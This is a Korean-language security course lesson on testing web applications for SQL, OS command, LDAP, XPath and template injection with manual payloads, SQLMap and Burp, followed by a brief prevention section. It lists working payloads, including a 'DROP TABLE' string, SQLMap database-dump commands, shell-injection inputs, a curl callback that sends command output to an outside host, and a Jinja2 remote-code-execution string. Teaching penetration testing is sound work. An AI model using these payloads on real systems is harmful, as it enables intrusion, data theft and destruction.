인젝션 취약점 테스트
SQLMap, 수동 페이로드, Burp를 사용해 SQL, 명령어, LDAP 인젝션을 테스트합니다.
인젝션 취약점 테스트은(는) CoddyKit의 무료 Cyber Security Academy 강의입니다. 이것은 4개 중 2번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Cyber Security Academy 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
주입 취약점 유형
주입은 신뢰할 수 없는 데이터가 명령이나 쿼리의 일부로 인터프리터에 전달될 때 발생합니다. 인터프리터가 데이터와 명령을 구분하지 못해 공격자가 제어하는 로직을 실행하게 됩니다. SQL, 명령, LDAP, XPath 및 템플릿 주입이 모두 이 유형에 해당합니다.
SQL 주입: 수동 테스트
SQL 주입 여부를 확인하기 위해 간단한 페이로드부터 사용하십시오. 취약한 애플리케이션에서는 작은따옴표 하나가 SQL 구문 오류를 일으킵니다. 오류 메시지, 응답 길이의 차이 및 응답 시간을 확인하십시오.
# Test for SQLi:
' -- basic quote
'' -- doubled quote
1' OR '1'='1 -- always-true
1; DROP TABLE users -- statement terminator
# In URL:
https://target.com/item?id=1'자동화된 SQLi를 위한 SQLMap
SQLMap은 SQL 주입 탐지와 악용을 자동화합니다. 주입 지점을 탐지하고 DBMS를 식별하며, 데이터베이스를 덤프하고 파일을 read하며 취약한 시스템에서 OS 코드 실행을 수행할 수 있습니다.
# Basic scan
sqlmap -u 'http://target.com/item?id=1'
# With Burp request file
sqlmap -r request.txt
# Dump databases
sqlmap -u 'http://target.com/item?id=1' --dbs
# Dump a table
sqlmap -u '...' -D mydb -T users --dump명령 주입 테스트
명령 주입은 사용자 입력이 OS 셸 함수에 전달될 때 발생합니다. 셸 메타문자인 세미콜론, 파이프, 백틱 및 $() 명령 치환을 사용하여 테스트하십시오.
# Test inputs (form fields, URLs, headers):
; id
| id
`id`
$(id)
&& id
# Blind (no output): use time delays
; sleep 5
| ping -c 5 127.0.0.1
# Or out-of-band:
; curl http://collaborator.example.com/$(id)LDAP 주입
LDAP 주입은 인증과 디렉터리 조회에 사용되는 LDAP 쿼리를 조작합니다. 다음 값을 사용하여 인증 필드를 테스트하고 필터를 우회하십시오: *)(uid=*))(|(uid=*
XPath 주입
XPath 주입은 XML 기반 인증 시스템을 대상으로 합니다. SQLi와 유사하게 페이로드가 XPath 쿼리를 조작합니다. 다음 값을 사용하여 인증을 우회하십시오: ' or '1'='1
템플릿 주입(SSTI)
서버 측 템플릿 주입은 사용자 입력이 템플릿 엔진(Jinja2, Twig, Freemarker)에서 렌더링될 때 발생합니다. {{7*7}}을 주입하여 탐지할 수 있습니다. 응답에 49가 표시되면 SSTI가 존재합니다.
# Detection payloads:
{{7*7}} # Jinja2, Twig
${7*7} # Freemarker, EL
<%= 7*7 %> # ERB (Ruby)
# RCE via Jinja2:
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}주입 테스트에 Burp 사용
요청을 리피터로 보내고 각 매개변수에 페이로드를 수동으로 주입하십시오. 주입 단어 목록을 사용하여 퍼징을 자동화하려면 인트루더를 사용하십시오(SecLists에는 뛰어난 주입 페이로드가 있습니다).
# SecLists injection wordlists:
/usr/share/seclists/Fuzzing/SQLi/
/usr/share/seclists/Fuzzing/SSTI/
/usr/share/seclists/Fuzzing/command-injection*블라인드 주입 탐지
눈에 보이는 출력이 없을 때는 실행을 확인하기 위한 시간 지연, OOB DNS 콜백(Burp Collaborator 또는 interactsh), 불리언 기반 응답(콘텐츠 길이 변화)을 사용하십시오.
애플리케이션 오류 메시지 읽기
상세 오류는 데이터베이스 유형, 쿼리 구조 및 파일 경로를 드러내므로 정확한 페이로드를 작성하는 데 매우 유용합니다. 일반적인 페이로드와 함께 디버그 정보나 오류를 드러내는 입력값으로도 항상 테스트하십시오.
예방 참고 자료
주입은 매개변수화된 쿼리(SQLi), 입력값 검증과 셸 이스케이프(명령 주입), 사용자 입력의 템플릿 렌더링 방지(SSTI)를 통해 예방할 수 있습니다. 개발자는 안전한 코드를 작성하려면 이러한 방법을 이해해야 합니다.
빠른 확인
응답에 49가 표시될 때 SSTI 탐지 페이로드 {{7*7}}은 무엇을 확인합니까?
요약: 주입 테스트
주입 취약점은 데이터와 명령을 섞어서 처리할 때 발생합니다. 모든 사용자 제어 입력값을 SQL, 명령, 템플릿 및 LDAP 주입 페이로드로 테스트하십시오. 자동화된 SQL 주입에는 SQLMap을, 수동 테스트에는 Burp 리피터를 사용하고, 블라인드 악용에는 시간 지연 및 OOB 기법을 사용하십시오. 보고서를 위해 페이로드와 증거를 항상 문서화하십시오.
자주 묻는 질문
“인젝션 취약점 테스트” 강의는 무료인가요?
네 — “인젝션 취약점 테스트” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Cyber Security Academy 강의 전체를 잠금 해제할 수 있습니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
“인젝션 취약점 테스트”에서 뭘 배우나요?
SQLMap, 수동 페이로드, Burp를 사용해 SQL, 명령어, LDAP 인젝션을 테스트합니다. 브라우저에서 직접 실행하는 실습 코드로 Cyber Security Academy을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.
Cyber Security Academy을(를) 시작하는 데 경험이 필요한가요?
사전 경험은 필요하지 않습니다. CoddyKit의 Cyber Security Academy은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 2번째 강의입니다.
“인젝션 취약점 테스트” 강의는 얼마나 걸리나요?
대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.
이 Cyber Security Academy 강의에서 코드를 작성하고 실행할 수 있나요?
네. 모든 Cyber Security Academy 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.